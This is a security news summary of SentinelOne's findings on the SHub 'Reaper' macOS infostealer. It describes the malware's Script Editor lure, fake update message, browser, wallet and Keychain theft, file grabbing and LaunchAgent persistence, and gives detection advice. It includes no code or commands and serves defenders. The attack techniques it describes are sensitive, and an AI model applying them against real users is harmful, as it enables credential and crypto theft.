Introduction to SHub macOS Infostealer
A new variant of the SHub macOS infostealer, dubbed Reaper, has been identified by SentinelOne researchers. This malware uses AppleScript to show a fake security update message and installs a backdoor, allowing it to steal sensitive browser data, collect documents and files, and hijack crypto wallet apps.
How SHub Reaper Works
The Reaper variant uses the applescript:// URL scheme to launch the macOS Script Editor preloaded with a malicious AppleScript, bypassing Terminal-based mitigations introduced by Apple in late March with macOS Tahoe 26.4. The malware is distributed through fake installers for WeChat and Miro applications hosted on domains made to appear legitimate.
Before invoking the AppleScript, the malicious websites fingerprint the visitor's device to check for virtual machines and VPNs, and enumerate installed browser extensions for password managers and cryptocurrency wallets. All telemetry data is delivered to the attacker via a Telegram bot.
Technical Details of SHub Reaper
The script with the command that fetches the payload is constructed dynamically and hidden under ASCII art. When the victim clicks ‘Run,’ the script displays a fake Apple security update message referencing XProtectRemediator, downloads a shell script using ‘curl,’ and executes it silently via ‘zsh.’
The malware performs a system check to determine if the victim uses a Russian keyboard/input, and if there’s a match, it reports a ‘cis_blocked’ event to the command-and-control (C2) server and exits without infecting the system. If the host is not Russian, Reaper retrieves and executes the malicious AppleScript with the data theft routine using the osascript command-line tool built into macOS.
Data Theft and Hijacking
Upon launch, the malware prompts the user for their macOS password, which can then be used to access Keychain items, decrypt credentials, and access protected data. The infostealer targets browser data from Google Chrome, Mozilla Firefox, Brave, Microsoft Edge, Opera, Vivaldi, Arc, and Orion, as well as cryptocurrency wallet browser extensions and password manager browser extensions.
The malware also includes a “Filegrabber” module that searches the Desktop and Documents folders for file types likely to contain sensitive info, and collects targeted files smaller than 2MB, or up to 6MB in the case of PNG image files, with a limit for the total volume set to 150MB.
Persistence and Remote Access
The SHub Reaper malware establishes persistence by installing a script impersonating the Google software update and registers it using LaunchAgent. The script is executed every minute and acts as a beacon that sends system info to the C2. If the script receives a payload, it can decode and execute it in the context of the current user, and then delete the file, thus giving the attacker extended access to the machine.
SentinelOne warns that the SHub operator is extending the infostealer's capabilities to include remote access to compromised devices, which could allow fetching additional malware. The researchers have provided a set of indicators of compromise that could help defenders protect against malicious behavior associated with the new SHub Reaper infostealer variant.
Conclusion and Recommendations
SentinelOne recommends monitoring for suspicious outbound traffic after Script Editor execution, or new LaunchAgents and related files in the namespace of trusted vendors. The researchers highlight the importance of validating six surfaces to protect against threats, including whether controls block threats, detection rules fire, and cloud configs hold.
Source: BleepingComputer